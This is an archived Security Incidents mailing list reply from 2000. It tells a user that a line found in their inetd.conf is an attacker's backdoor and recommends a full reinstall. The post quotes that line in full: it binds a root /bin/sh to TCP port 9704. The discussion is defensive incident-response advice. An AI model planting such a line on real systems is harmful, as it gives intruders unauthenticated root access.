Security Incidents mailing list archives
Re: Possible widespread hole?
From: An Thi-Nguyen Le <viper () SRH1003 URH UIUC EDU>
Date: Sun, 27 Aug 2000 01:17:51 -0500
On Sat, Aug 26, 2000 at 06:07:32PM -0000, c_patin () HOTMAIL COM typed: } I was snooping around my box yesterday, and noticed the } following MAJOR hole listed at the bottom of } /etc/inetd.conf: } 9704 stream tcp nowait root /bin/sh sh -i You were hacked. } I have since closed the hole, and placed my box behind a } hardware firewall to protect it. But the interesting thing } is that I was reading Slashdot a little while ago and } mentioned this in an article about security. And someone } else had the same exact hole listed inside of his } /etc/inetd.conf. Is this possibly some major hole in a } package that we both installed, or did we just get hacked by } the same person. Seems a little weird to just be } coincidence. Any advice or ideas? You were hacked. No doubts about it. Someone put that backdoor in your inetd.conf to make sure they could get back in, should you close the original hole they hacked through. In fact, they're probably running their own version of inetd and have hacked up ps and netstat so that you can't tell. Whatever distribution you have, make sure your packages/programs/whatnot are all updated to non-vulnerable versions. A default RedHat install of any kind, for instance, is very, very wide open. As your machine has been hacked, I would suggest a *complete* reinstall of your operating system, unless you feel like wondering whether your binaries are trojaned or not, which they probably are. -- An Thi-Nguyen Le |Help me, I'm a prisoner in a Fortune cookie file!
Current thread:
- Possible widespread hole? c_patin (Aug 26)
- Re: Possible widespread hole? Alexander Schreiber (Aug 27)
- Re: Possible widespread hole? An Thi-Nguyen Le (Aug 27)
- Re: Possible widespread hole? Andreas Östling (Aug 27)
- Re: Possible widespread hole? Jon Lewis (Aug 27)